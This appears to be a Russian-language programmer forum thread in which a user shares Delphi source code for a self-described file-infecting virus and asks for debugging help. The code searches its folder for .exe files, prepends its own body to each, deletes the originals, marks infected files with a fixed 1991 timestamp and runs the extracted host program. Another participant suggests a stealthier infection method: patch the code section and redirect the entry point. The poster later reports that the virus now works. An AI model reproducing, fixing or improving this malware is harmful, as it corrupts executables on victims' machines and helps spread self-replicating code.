Программа 'Паразит'

[Человек_Борща]

1.Первое вы игнорируете оригинальный образ вируса, но не его копии, таким образом в exe целевом будет не 1 ваша копия, а n-надцать.
2. Это не вирус, это просто порча файлов. С тем же успехом можете просто копировать оригинал в места целевых exe под их жеименами, с заменой, дописывая нужное кол-во 0й к копии, чтоб был такого размера как и нормальный exe.

куда правильнее было бы прописать свой код в конец секции кода exe, не забыв указать на точку входа оригинального exe, а исходную переставить на свой собственный код.

Это и exe не портит и работает весело, да и ловить это тоже очень весело.

[Serge_Bliznykov]

вот-вот, а в декабре девушка тут на форуме антивирус на Delphi писала.
Как раз на подобный вирус...

http://www.programmersforum.ru/showthread.php?t=251824
http://www.programmersforum.ru/showthread.php?t=250391

p.s. она выкладывала код учебного вируса, он реально работал, заражал все exe-шники в одной с ним папке.

[Karateka]

В общем ребят, вроде написал, но работает не до конца. Заражает exe-шник. При запуске зараженного exe-шника, выделяет программу и запускает её, но потом сам зараженный exe-шник просто зависает. В чем может быть проблема. Прога заражает только exe файлы меньше 2Мб.
Прилагаю картинку с запуском. После слов I AM VIRUS 0_0, прога виснет, нажимаю Enter, чтобы выполнить оператор readln, который в конце проги, никакой реакции. Остается только уничтожать процесс в диспетчере задач.

Код:

program ProgVir;

{$APPTYPE CONSOLE}

{$R *.res}

uses
  System.SysUtils,
  Windows;

var
 _SearchResult : TSearchRec;
 _Result : integer;
 _Programm : file;
 _Virus : file;
 _CopyFile : string;
 _bufferVirus : array [1..1200000] of byte;
 _SizeVirus : integer;
 _SizeProgramm : integer;
 _bufferProgramm : array of byte;
 _bufferProgramm1 : array [1..2000000] of byte;
 _NameProgramm : string;
 _FM : integer;
 _NC : integer;
 _INFECT : boolean;
 _newDateTime : TDateTime;

const
 _TempFile  = 'TempFile.exe';
 _VirusSize =  1159157;

begin
 _Result := FindFirst('*.exe', faAnyFile,_SearchResult);

 _newDateTime := StrToDateTime('15.04.1991 15:00:00');



  _FM := FileMode;
  FileMode := 0;
  _CopyFile :=  ParamStr(0);
  CopyFile(@_CopyFile[1],'W:\copy.exe', false);
  AssignFile(_Virus, 'W:\copy.exe');
  Reset(_Virus, 1);
  _SizeVirus := FileSize(_Virus);
  writeln('Size Virus = ',_SizeVirus);
  writeln('Search Size = ',_SearchResult.Size);
  BlockRead(_Virus, _bufferVirus, _SizeVirus, _NC);
  CloseFile(_Virus);
  FileMode := _FM;

 if (_SizeVirus > _VirusSize ) then
  begin
  FileMode := 2;
  AssignFile(_Programm, 'W:\copy.exe');
  Reset(_Programm,1);
  _SizeProgramm := FileSize(_Programm) - _VirusSize;
  writeln ('_SizeProgramm (in IF)',_SizeProgramm);
  seek(_Programm, _VirusSize);
  BlockRead(_Programm, _BufferProgramm, _SizeProgramm, _NC);
  CloseFile(_Programm);
  AssignFile(_Virus, _TempFile);
  ReWrite(_Virus,1);
  BlockWrite(_Virus, _BufferProgramm, _SizeProgramm, _NC);
  CloseFile(_Virus);
  WinExec('TempFile.exe',1);
end;

 writeln('I AM VIRUS! 0_0');
 _Result := FindFirst('*.exe', faAnyFile,_SearchResult);
 _INFECT := false;
 while _result = 0 do
          begin
if DateTimeToStr (FileDateToDateTime(fileage(_SearchResult.Name))) = '15.04.1991 15:00:00'
  then _INFECT:= true;

   if _INFECT = false
    then
     begin


 if (_SearchResult.Name <> ExtractFileName(ParamStr(0))) then
  begin
   _NameProgramm := ExtractFileName(_SearchResult.Name);
   writeln(_NameProgramm);
   _FM := FileMode;
   FileMode := 0;
   AssignFile(_Programm, _SearchResult.Name);
   Reset(_Programm,1);
   _SizeProgramm := FileSize(_Programm);
  // writeln('Size Programm = ',_SizeProgramm);
   BlockRead(_Programm, _bufferProgramm1, _SizeProgramm, _NC);
   write(length(_bufferProgramm1));
   CloseFile(_Programm);
   FileMode := _FM;
   FileMode := 2;
   AssignFile(_Programm, _TempFile);
   ReWrite(_Programm,1);
   BlockWrite(_Programm, _bufferVirus, _SizeVirus, _NC);
   seek(_Programm, _SizeVirus);
   BlockWrite(_Programm, _bufferProgramm1, _SizeProgramm,_NC);
   DeleteFile(PChar(_SearchResult.Name));
   CloseFile(_Programm);
   Rename(_Programm, _NameProgramm);
   FileSetDate (_SearchResult.Name,DateTimeToFileDate(_newDateTime));
   FileMode := _FM;
   end;
    _Result := FindNext(_SearchResult);
  end;
end;

readln;

end.

[Karateka]

Все, вроде решил проблему. Выполняется без ошибок. А суть проблемы у меня была в том, что я использовал массив, который был у меня объявлен динамически. Факт в том, что я его объявлял, но потом его не использовал, а стал использовать обычный массив. Про него забыл и не убрал из переменных. А когда записывал программу, то писал в него, потом-то у меня ошибки и лезли. Код перелопатил, разделил на процедуры. Теперь красивее выглядит. Да и, была проблема, что файл заражал сам вирус, тоже исправил. Теперь все работает отлично. Пока тему не закрывайте, пару вопросов еще будет.